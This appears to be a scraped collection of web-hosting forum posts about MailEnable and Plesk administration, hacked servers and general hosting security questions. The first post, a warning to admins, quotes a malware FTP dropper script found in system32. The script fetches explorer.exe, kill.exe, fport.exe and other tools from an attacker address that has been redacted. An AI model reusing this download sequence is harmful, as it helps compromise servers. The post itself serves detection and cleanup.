I didn't see this posted anywhere here so I just thought I'd give everyone who uses MailEnable a heads up. If you are not using the most up to date version of MailEnable, run to [url] and download it.
I have seen couple of dozen boxes getting infected because they had a MailEnable Standard 1.95 for instance (or Professional 2.11), or anything else that's not up to date. Virus(es) are severe and will cause you a lot of problems... if your server still hasn't been infected and you're not using the latest MailEnable, go upgrade right away!
If you are a hosting company and are using Plesk 7.6.1 you definitely have your helpdesk swapped by now. Biggest problem is that Plesk 7.6.1 comes with MailEnable Std 1.95 where the latest version is 1.981. I have seen servers that were clean OS installs, Plesk 7.6.1 installed and 5 minutes after the box was compromised.
If you are still able to access the box by RDP (or have access to it locally), make sure to disable MailEnable SMTP Relay Service. This is not a part of MailEnable and if you don't disable it you won't be able to remove rdriv.sys from your system32 directory which does quite something to your server. Also check for following:
Make sure you don't have script1.txt in system32, and if you have it make sure to remove it. It contains:
open XXX.XXX.XXX.XXX (IP edited away by Boon Chuan to prevent abuse)
user anonymous
anonymous@on.the.net
lcd c:windowssystem32
get explorer.exe
get runservice_bis.dll
get kill.exe
get fport.exe
get hyberport.exe
get JASFV.INI
bye
Nothing has been heard from SWsoft about this issue yet...
when i click "Email Accounts" section in Helm see "Failed to get Email Accounts",also cant add any new Email Account, Helm Log:
Cannot create ActiveX component. at Microsoft.VisualBasic.Interaction.CreateObject(String ProgId, String ServerName) at MailEnable.Administration.Mailbox.GetAutoResponderStatus() at WHA.Helm.Providers.MailEnableProvider.MailEnableEngine.GetAccount(String name) at WHA.Helm.Providers.MailEnableProvider.MailEnableEngine.GetAccountList() at MailEnableProvider.ListEmailAccounts(ProviderData CommandData) ......
I have MailEnable free on a windows server with Plesk 8.1.
I need IMAP so I thought at hMail. The problem:
I need to copy all the mail content to hMail as I understand Plesk will copy all the accounts except the mail content.
I have found that I can use some vbs from PMM but that requires me to know all the accounts passwords and to do manually every backup/restore for all the e-mails.
Is there an other way to switch to hMail without loosing the mail content ? (IMAPCopy is not an option as it need IMAP and that is not present in MailEnable free, and also needs all all the passwords for all the accounts).
An other problem, I do not have an other windows server so I cannot use Plesk Migration Manager to migrate accounts and then migrate back.
we received a report of a malicious mail being sent from our servers. Problem is that the sender and recipients are not hosted with us. What I'm trying to find out is how the mail got sent out. The ME logs shows that the connection was made from 127.0.0.1 to the smtp service, but that's it.
We don't run mail services (pop3/imap/webmail) on the web servers, if that helps any. Have run out of ideas after sifting thru lots of logs (was trying to find if anyone called an application to send the mail and attachments out), but came up empty.
I'm using the free edition of MailEnable and need to configure each post office to copy all incoming and outgoing email to one of the email accounts on the same post office.
Is there a way to configure this ?
I know I can configure mail forwarding on incoming mail per account but need to do it for all acounts (except the audit account).
e.g. anythinghere@dbnetsolutions.co.uk incoming or outgoing would be copied to audit@dbnetsolutions.co.uk
I added users directly to mailenable (using their migration utility to import from an old mail server which plesk does not support). The domains exist in plesk but not the individual email users/mailboxes.
Now I want to add those email users to plesk but it doesn't let (not surprisingly), when I try to add a user it returns an error: "Unable to update the mail account properties:mailmng failed: MEAOPO.Mailbox.AddMailbox failed"
My question is: How can I add the users that already exist in MailEnable to the plesk configuration? (i.e. ignore the error and add the user to the plesk database, or even better yet if plesk can read the configuration and add all users)
Tthe plesk kb articles suggest running mchk.exe but that is designed to take users from plesk and add them to mailenable, I need the reverse).
Is there a way to configure the mailing lists created with Plesk (using MailEnable 6.5) using Plesk or another web interface like it is possible with mailman under Linux?
It is not very convenient to be required to do such stuff via RDP (and so manual by me for every customer)...
I use Windows Plesk v 11.5.30 with Mailenable Standard Edition 7.0 version. In mailenable site i saw a new version of Mailenable standard version (7.5.1). URL...Can i download and update Mailenable version of my Windows PLesk? If i made this change and have problem can i do downgrande later?
I run a web hosting company and one of my servers is a LAMP server running CentOs 5. A user of mine has a Joomla installation running to manage his website and he has run into the following problem that I am puzzled by.
When Joomla adds a component or module to itself, or when a user uses the Joomla upload functionality, Joomla will add the new files under the user name "apache". This makes sense as it is the apache service running PHP that is actually creating the files.
However, when he FTP's into the account to modify these files, he doesn't have the appropriate permissions to do so as he doesn't have a root level login, just permissions on his home directory which is the site. Any help would be much appreciated.
Also, does anyone know how to change the owner/group of a directory and all of its sub directories in Linux without changing the actual permissions? I.e. some of the files in the folder have different permissions (0644 as apposed to 0755) than its parent but if I do a top down user/group change on the folder it will change everything in that folder to 0755.
I have regarding hosting/designing my application. Users of my website upload highly sensitive files to the server. I'll use SSL but will that be enough since the files are not encrypted on the server. I tried to encrypt the files but that is adding a huge overhead.
My first question is - is it a good idea to store the files on the server rather than a database? My other question is regarding hosting; I'm thinking of building my own server and host it in a colo. Is colo more secure than dedicated hosting? Currently i'm still in the process of developing my App and my environment is Windows Server 2008/SQL Server 2005.
Is there any problems with having duplicate rules in different files as I have downloaded some rules and am going to make them all into one file to give me the best protection, but this is going to take time and I really need some sort of protection now
after install ConfigServer Firewall i get the following ...
ConfigServer Security & Firewall - csf v2.89 >> PHP Check >> Check php for register_globals >> WARNING >> You should modify the PHP configuration (usually in /usr/local/lib/php.ini) and set: register_globals = Off
unless it is absolutely necessary as it is seen as a significant security risk
must i modify it?or not? put in ur consideration i tried to download it to modify an error occured!
I am on a shared server account with Lunar Pages basic hosting plan.
The only script file I have up running is db Masters FormM@iler. It runs on Cpanel. I deleted whatever other scripts I could find on my server. The site is just basic html pages with jpgs and a gif.
Is there much else I really need to do to secure the server or is that more in Lunar Pages' hands?
If there is still more I can do to secure the server, and is it a small amount that's easy to do or would it be wise to just hire someone else to put in a few hours making sure everything is truly set up securely?
I have a vps that has been exploited, and the hosting company is giving me advise on what to do to fix the security problems, but i need a good server administrator/company to help me with this. can anyone recommend a company that will go thru my server,
I'm inheriting a website that is currently a mess. It was designed in Joomla, but everything about the site by the original designer, is completely a mess. Files weren't placed in their proper directory hiearchy, the site has been hacked into a few times...basically a big headache.
I'm willing to learn and my first goal is the redesign the site. Currently, I'm looking at choosing a CMS or just rebuilding it in Joomla. The problem is that the site is a big part of the business, so any down time is not good.
I have some questions I hope you experienced folks can help me with...
Does CMS choice have any bearing on whether or not its a security vulnerability? If so, which one's are "less a target" of getting hit?
I just want to design the site from scratch and make it secure as possible from suggestions on various forums. I don't want to be a security admin, but is that what I'll end up having to do to run a site like this?
What are my options between "doing it myself" vs "hiring a third party"?
The company is right now in a tween stage. Fast growth but not enough to hire a security guy, based on my talks with the CEO. I disagree with this, but what can I do in the meantime to plug the site holes?
I'm almost wanting to go commercial so I don't have all the headaches, but the company wants to save money. What can be done in those situations?
Before I go out and spend money on books, what do you recommend I buy to start getting my feet wet in what may become a future in IT security?
This is from someone who's just inherited a dedicated server with a swiss cheese website. What is the first order of business for someone who is in the dark and will not get much support in regards to spending more money?
I noticed that my vps had utilized 250 gig of traffic in one day [i average 5 gig per MONTH] with cpu usage of close 100%; my hosting company pinpointed one php file which had allowed an outside varibale to be placed in "include" function so that the outside php code was being run;
Is there any program/scripts that can immediately email me if cpu usage stays high the nic card is being utilized too much memory usage exceed certain levles this way, i would know i have been hijacked in time and try to find the culprit i use knownhost with cpanel/linux mysql and php.
i have an unix server [don't know what version i think it's FreeBSD ]
[url]
and i use WS_FTP to upload the files to my server.. but i have a big problem all my files are encrypted with some problems but when people use getrigh browser or some kind off program to acess my server instead of a normal browser it appears the list of files i have upload and they can download them and when i set password for images etc it's all safe, but people can't acess parts of the site without password... i want to know if there's some way of protect my file without interfering with the normal browser acess.
when we run server with shared hosting. we mostly facing issue os security like c9shell scripts.. as well as ppl hacked database or changed index.html. we do enable php open base dir as well as mo security firewall we do search which user is using find command who is uploading file... but is there any other way to secure server for such hacking issue..
We have a e-commerce web site that has the latest shopping cart software ( that is known to be secure) ssl cert, etc.
We got a call today from a guy who says that he used his brand new card on our web site and that the card was stolen and used on anothoer site within hours. We have checked every file on the web site, logging into serevr root and checking everything and cant find any evidence of a hack or security breach of any kind.
can someone recommend a reliable company that can go in and check things out for us to see if they can find anny security issues, or evidence of a breach? There must be a company out there that does this sort of thing
I am conducting some research into potential risks that web hosts have to deal with on a daily basis. What potential security risks are there for web hosts ? And how do they overcome these issues?